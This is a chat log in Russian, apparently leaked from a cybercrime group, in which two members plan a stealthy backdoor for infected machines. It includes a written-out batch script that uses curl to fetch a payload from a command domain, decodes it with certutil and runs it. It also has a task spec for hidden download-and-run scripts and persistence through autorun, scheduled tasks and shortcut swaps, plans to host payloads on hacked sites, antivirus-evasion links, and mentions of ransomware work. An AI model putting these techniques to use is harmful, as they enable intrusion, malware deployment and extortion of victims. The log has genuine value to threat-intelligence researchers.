Timestamp	From	To	Message
2020-06-22 07:54:30.245511	professor	buza	большая человеческая просьба, добавьте запуск шеллкода в Anchor тоже раз в лоадере есть, просто будет блять очень кайфово, просто нереально круто будет
2020-07-09 08:22:13.504586	buza	professor	маякни
2020-07-09 14:31:52.040947	buza	professor	маякни
2020-07-09 14:32:04.875687	professor	buza	маякую
2020-07-28 08:27:21.644858	buza	professor	привет маякни пожалуйста
2020-07-28 11:09:55.563832	buza	professor	привет маякни пожалуйста
2020-07-28 11:10:08.314927	professor	buza	привет
2020-07-28 11:10:08.316794	professor	buza	маякую
2020-09-02 12:52:48.602043	buza	professor	Привет всем.
Всем разработчикам, включая веб, просьба скинуть мне краткий список своих скиллов по языкам программирования и стекам.
Спасибо.
2020-09-02 12:53:28.166112	professor	buza	Привет всем.
Всем разработчикам, включая веб, просьба скинуть мне краткий список своих скиллов по языкам программирования и стекам.
Спасибо.
2020-09-14 07:05:13.514435	professor	buza	отруби отр
2020-09-14 07:05:26.377157	buza	professor	[10:05:00] <buza> а это не твой второй акк в этой жабе? я думал это твой дубль
2020-09-14 07:05:36.417311	professor	buza	не, просто никнейм в жабе прописан и все
2020-09-14 07:05:40.142307	professor	buza	у меня нет второго акка
2020-09-14 07:05:43.595469	buza	professor	ясно
2020-09-14 07:05:58.322131	professor	buza	со скаем списались, все ок, сегодня дам ему тестовую среду
2020-09-14 07:06:04.817649	buza	professor	ага
2020-09-14 07:06:34.310337	buza	professor	в пятницу работали?
2020-09-14 07:06:34.978248	professor	buza	вроде вопросов по задаче у него особо нет, просто надо дебажить садится, будешь с ним общаться - скажи что если что нужно чтобы мне прям писал - дадим и QA и тест среду и все что нужно
2020-09-14 07:06:38.041660	professor	buza	чтобы тебя не отвлекать
2020-09-14 07:06:50.454641	professor	buza	конечно работали)
2020-09-14 07:07:08.780999	professor	buza	вцелом с бк все окей, у меня правда есть проблемка одна... точнее как проблемка, нюанс скорее
2020-09-14 07:07:11.918286	buza	professor	чето не вижу там особо новых ботов
2020-09-14 07:07:26.453244	professor	buza	а ты про прогруз? так серт же вышибло в пятницу
2020-09-14 07:07:31.725474	buza	professor	ааа
2020-09-14 07:07:33.013616	buza	professor	не знал
2020-09-14 07:07:35.525843	buza	professor	да, про прогруз
2020-09-14 07:07:43.348839	buza	professor	так что с бк
2020-09-14 07:07:51.355678	professor	buza	все ок 
нужен шеллкод только
2020-09-14 07:08:00.086764	professor	buza	починим - и все ваще заебись будет
2020-09-14 07:08:15.657223	professor	buza	по отстуку не знаю - тут к таргету лучше уточнить, а по функционалу у меня вопросов нету, все заебись
2020-09-14 07:08:19.943013	buza	professor	шеллкод ван просто отключал
2020-09-14 07:08:27.129000	buza	professor	говорит включил на группе р1
2020-09-14 07:08:27.789612	professor	buza	ага я понял
2020-09-14 07:08:40.396917	buza	professor	но там по идее все еще старый формат кода
2020-09-14 07:08:48.552194	professor	buza	[10:05:00] <buza> а это не твой второй акк в этой жабе? я думал это твой дубль
2020-09-14 07:08:48.714563	professor	buza	мы с бентли потестим сегодня, он в курсе да?
2020-09-14 07:08:50.734741	buza	professor	такой как в любом hex-редакторе
2020-09-14 07:09:49.841154	professor	buza	нужен твой совет
я ломаю голову как лучше бекдорится...
мы сейчас сделали "пробный" заход на бекдор на кобальте - но это конечно колхоз откровенный потому что ипак/домены кобальта которые запускаем с БК в блек улетят шустро очень
2020-09-14 07:10:05.078915	buza	professor	давай
2020-09-14 07:10:05.706301	professor	buza	на анкор крепить = убить анкор
2020-09-14 07:10:40.622852	buza	professor	нужен загрузчик какой-нибудь на скрипте
2020-09-14 07:10:43.761746	buza	professor	простенький, типа на .bat
2020-09-14 07:10:44.974797	professor	buza	да
2020-09-14 07:10:53.089173	professor	buza	прям вот максимально легкий бекдор
2020-09-14 07:10:55.252616	buza	professor	крепить запуск этого скрипта
2020-09-14 07:11:01.783304	buza	professor	ну у нас такого нету прям вот щас
2020-09-14 07:11:04.102313	buza	professor	задача по нему есть
2020-09-14 07:11:15.603118	buza	professor	на коленке могу предложить такую схему
2020-09-14 07:11:32.732643	buza	professor	загрузчик на скрипте пусть дергает какой-нибудь адрес или домен
2020-09-14 07:11:46.211900	buza	professor	на домене 99% ничего нету - тупо нет ответа, порт в дауне
2020-09-14 07:12:02.217327	buza	professor	как надо работать - порт подымается, отдает нагрузку и снова опускается
2020-09-14 07:12:11.236681	buza	professor	т.е. отстук на мертвый адрес
2020-09-14 07:13:21.562901	professor	buza	да, вцелом хорошо, в качестве нагрузки мы также можем использовать кобальт в принципе
сейчас проблема с кобальтом в том что мы вынуждены длл пейлоада оставлять и эту длл разбирают отлавливая коннекты
2020-09-14 07:15:09.990031	professor	buza	» загрузчик на скрипте пусть дергает какой-нибудь адрес или домен 
а может на пвш сделать целиком закладывая скрипт повершелла в реестр/стартап?
2020-09-14 07:15:29.210409	buza	professor	можно и так
2020-09-14 07:15:37.123187	buza	professor	ав очень подозрительны на пвш
2020-09-14 07:15:45.505584	buza	professor	надо в скрипт добавлять обход amsi
2020-09-14 07:16:03.526594	buza	professor	у меня обычные скрипты для автотеста на пвш выметаются напрочь авастом и симантеком,если не ставить в исключения
2020-09-14 07:16:07.246076	professor	buza	ну они подозрительны на все что тянет что-то снаружи скриптом
если без пвш то как? битсадмин?
2020-09-14 07:16:09.741558	buza	professor	а они просто делают закачку с сайта
2020-09-14 07:16:48.267436	buza	professor	можно попробовать сделать просто "start url" на скрытом десктопе как-то
2020-09-14 07:16:58.904075	buza	professor	тогда штатный боузер откроет
2020-09-14 07:17:23.222392	buza	professor	есть еще вариант
2020-09-14 07:18:26.315811	buza	professor	- качаем вспомогач утилиту по хардкод линку, типа curl
- далее загрузку основной нагрузки делаем утилитой
2020-09-14 07:19:23.099472	buza	professor	суть в том, что вспомогательная утилита "белая", ее хэши известны всем ав и подписана
2020-09-14 07:19:57.912075	buza	professor	а что она там скачивает, через смартскрин не проходит, и ссл-стек у неё свой
2020-09-14 07:20:14.422516	professor	buza	а запуск основной нагрузки как происходить будет?
2020-09-14 07:20:38.293044	buza	professor	ну вот смотри
2020-09-14 07:21:28.114075	buza	professor	закрепляющий код скачал и распаковал curl.zip и положил да хотя бы в downloads
2020-09-14 07:23:01.097173	buza	professor	далее поставил в авторан или в расписание такой скрипт:
@echo off
c:\users\user\downloads\curl-amd64\curl.exe https://command-domain.com/certificate.crt
certutil -decode certificate.crt payload.exe
payload.exe
2020-09-14 07:23:13.568591	buza	professor	certutil.exe - штатная утилита винды
2020-09-14 07:23:23.379257	professor	buza	а через цертутиль
2020-09-14 07:23:39.806549	professor	buza	норм варик
2020-09-14 07:27:37.613101	buza	professor	Коллеги, с прошедшим профессиональным праздником)
LET A = A + 1
2020-09-14 07:28:24.011405	professor	buza	о кстати))) звиняй)) забыл совсем тебя поздравить)
2020-09-14 07:28:38.393928	buza	professor	да, я уж тоже забыл всех поздравить )
2020-09-14 07:38:43.234760	professor	buza	образно получается на выходе у нас следующее, в начале рабочего дня до того как боты включили тачки мы кладем нужную нагрузку и поднимаем порт
тачки включаются - ловят пейлоад, как нужные "пришли" мы отключаем порт, плюс можем нагрузку менять произвольно и чистить ее если это требуется
2020-09-14 07:38:50.682981	professor	buza	правильно я уловил суть?
2020-09-14 07:39:08.614435	buza	professor	да
2020-09-14 07:39:10.493569	buza	professor	все верно
2020-09-14 07:39:53.515417	buza	professor	вот еще вариация:
2020-09-14 07:40:33.380179	buza	professor	все то же самое, но мы не включаем/отключаем порт, а кладем/убираем нагрузку на какой-нибудь сайт с хорошей репой, из тех куда у вас есть доступ
2020-09-14 07:40:36.015317	buza	professor	ломаные хосты
2020-09-14 07:40:56.108070	buza	professor	тогда все выглядит еще безобидней
2020-09-14 07:41:04.803431	buza	professor	пока не глянешь в .bat :D
2020-09-14 07:41:43.202226	professor	buza	тоже кстати вариант, шеллов у нас достаточно, просто меняем на нашем хосте ссылку на шелл с залитой нагрузкой
2020-09-14 07:41:56.185355	buza	professor	lf
2020-09-14 07:41:57.315879	buza	professor	да
2020-09-14 07:42:05.313860	buza	professor	можно даже просто подменять файл
2020-09-14 07:42:16.156269	buza	professor	когда не надо, кладешь туда какой-нибудь настоящий сертификат
2020-09-14 07:42:24.379384	buza	professor	а когда надо, заменяешь его нагрузкой
2020-09-14 07:42:33.031931	buza	professor	хотя, не
2020-09-14 07:43:03.838326	buza	professor	если скачается настоящий серт, то его утилита certutil будет пытаться преобразовать, и стартовый скрипт глюканет
2020-09-14 07:44:16.007537	professor	buza	сможете поднять это дело? а я пока резервные сервера подниму для отстука нагрузки, если спалится один - сразу "перекинем" на второй тогда без проблем и сменим нагрузку
и протестим быстренько в лабе, к следующему прогрузу от таргета если заварим это дело - будет очень в тему
2020-09-14 07:44:56.153462	professor	buza	файл нагрузки у нас кстати есть с самоликвидацией после кила процесса, билл сделал
есть еще сразу с миграцией - но он не зайдет, слишком сильно палится миграция сама (((
2020-09-14 07:45:34.262717	buza	professor	а что именно "это"?
2020-09-14 07:45:55.045684	buza	professor	конкретизируй задачу, что из этого
2020-09-14 07:47:03.766232	professor	buza	да поднять хост, дать батник и варианты прописывания батника по шкале от самого чистого до самого неприглядного (суть в том что некоторые методы закрепления просто не сработают и нужно иметь под рукой "логику" для операторов которая позволит их перебирать до победного) ну допустим сштаски отключены могут быть, ветки реестра недоступные для модификации и прописывания итд
2020-09-14 07:49:37.410163	buza	professor	щас подумаю кому
2020-09-14 07:49:46.912514	buza	professor	не забывай, у меня нету такого отдела скриптеров как у тебя уже есть
2020-09-14 07:52:09.169511	professor	buza	у меня пока тоже такого нет какой требуется, недельки полторы надо потерпеть еще и я по максимуму с тебя нагрузку снять постараюсь по нашему направлению, да и если что помочь думаю даже где-то чем-то сможем
2020-09-14 07:52:26.728841	buza	professor	пишу задачу
2020-09-14 08:00:55.358320	buza	professor	

Нужно сделать два скрипта и метод закрепления к ним.
Скрипты на .bat-файлах, возможно с использованием powershell версии не выше 2.0, либо jscript.exe
Скрипт 2 должен выполняться скрытно, без видимого окна.

Скрипт 1: установка закрепа
- скачать пакет curl https://curl.haxx.se/windows/dl-7.72.0_3/curl-7.72.0_3-win32-mingw.zip в downloads или temp
- если в системе нету архиватора (winrar, 7zip, winzip, итд популярные архиваторы), подобным образом скачать какой-нибудь официальный архиватор, standalone!
- распаковать пакет

Скрипт 2
- переменная в скрипте - url откуда качаем нагрузку
- скачать утилитой curl.exe, лежащей по известному пути, нагрузку с указанного в переменной линка
- certutil.exe decode нагрузка file.exe
file.exe
- remove file.exe

3.
Проработать разные методы закрепления:
- через autorun
- через AT
- через schtask
- подмена ярлыка на рабочем столе
- другие варианты

С учетом того, что у юзера могут быть разные права, могут отсутствовать права записи в реестр/запуска нужных команд.
Результатом этого пункта задачи являются командлеты (т.е. микро-скрипты), которые можно выполнить из командной строки cmd.exe.
Эти командлеты будут запускаться операторами вручную.
Командлет должен говорить, получилось или не получилось, дабы оператор понял, пробовать еще варианты или уже ок.
2020-09-14 08:01:00.623812	buza	professor	верно понял:?
2020-09-14 08:02:08.080939	professor	buza	
» Скрипт 2
» - переменная в скрипте - url откуда качаем нагрузку
» - скачать утилитой curl.exe, лежащей по известному пути, нагрузку с указанного в переменной линка
» - certutil.exe decode нагрузка file.exe
» file.exe
» - remove file.exe


ремув не надо, нагрузка не будет растворятся после запуска
да, все отлично остальное, все верно
2020-09-14 08:02:59.853956	buza	professor	дал машруму и кактусу независимо друг от друга
2020-09-14 08:03:39.224667	professor	buza	спасибо
2020-09-25 08:40:27.996150	professor	buza	привет
2020-09-25 08:40:33.588612	professor	buza	потестил аутлук граббер илона
2020-10-06 10:34:35.334318	buza	professor	хай
2020-10-06 11:34:50.391592	buza	professor	хай
2020-10-06 11:34:58.986601	professor	buza	привет
2020-10-07 16:53:10.179662	professor	buza	кароч никого я поллу не дам
2020-10-07 16:53:18.240239	professor	buza	решу с ним последний вопрос открытый когда стерн будет онлайн
2020-10-07 16:53:22.779269	professor	buza	и удаляю его из ростера
2020-10-12 09:37:06.736562	buza	professor	привет, нам тут сплойт предлагают купить
2020-10-12 12:36:38.878613	buza	professor	привет, нам тут сплойт предлагают купить
2020-10-14 14:03:28.371585	buza	professor	https://thedfirreport.com/2020/10/08/ryuks-return/
2020-10-14 14:06:04.813669	professor	buza	ну мало чем от наших движей отличается
2020-10-14 14:06:08.381836	professor	buza	да практически ничем на самом деле
2020-10-14 14:06:24.230768	professor	buza	adf.bat - эт ваще мой батник блять
2020-10-19 13:20:51.954937	buza	professor	https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/
https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/
https://github.com/RythmStick/AMSITrigger
https://amsi.fail/
2020-10-19 20:11:28.739894	buza	professor	https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/
https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/
https://github.com/RythmStick/AMSITrigger
https://amsi.fail/
2020-10-19 20:12:16.581003	professor	buza	спасибо) интересно
2020-10-20 07:10:55.458149	professor	buza	спасибо) интересно
2020-10-23 08:47:57.757728	professor	buza	» [11:45:35] <alter> умрет трикбот - все кончится 
» [11:45:41] <alter> это пиар ход 
» [11:45:54] <alter> ты в курсе геополитических ньюсов кроме выборов? 
» [11:46:11] <alter> что наш солнцеликий предлагал буквально недавно соглашение о прекращении кибератак заключить 
» [11:46:15] <alter> что было проигнорировано 
» [11:46:27] <alter> и в ответ была деаноннута правительственная ГРУ хак группа
2021-03-09 07:40:14.756064	professor	buza	бля сорян у меня инет умер
2021-03-09 07:40:17.629114	professor	buza	прямо пока я тебе писал
2021-03-09 07:42:12.454190	professor	buza	с тео поговорил но я ему сейчас в срочном порядке задачу накидываю делать аукционный движок для локера
2021-03-17 10:11:37.092202	professor	buza	здарова
тут?
2021-03-23 14:07:19.981743	professor	buza	ку
тут?
